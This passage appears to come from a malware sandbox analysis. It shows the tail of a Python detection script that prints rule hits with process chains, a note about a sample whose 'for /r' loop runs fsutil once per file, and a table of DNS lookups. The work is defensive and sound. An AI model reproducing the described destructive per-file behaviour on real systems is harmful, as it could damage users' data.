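        print(f'{hit["pid"]:>5}  {hit["technique"]:<10} {hit["rule"]:<45} {hit["chain"]}')
    print("verdict:", report["verdict"], "| techniques:", ", ".join(report["techniques"]))
```

Running the block prints one line per hit with its ancestry chain. A parent cmd.exe /c and the child it launches both fire the same rule, and the for /r loop launches fsutil once per file, so the verdict is computed from the set of distinct rules and techniques rather than from the raw hit count.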

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp

Files

N/A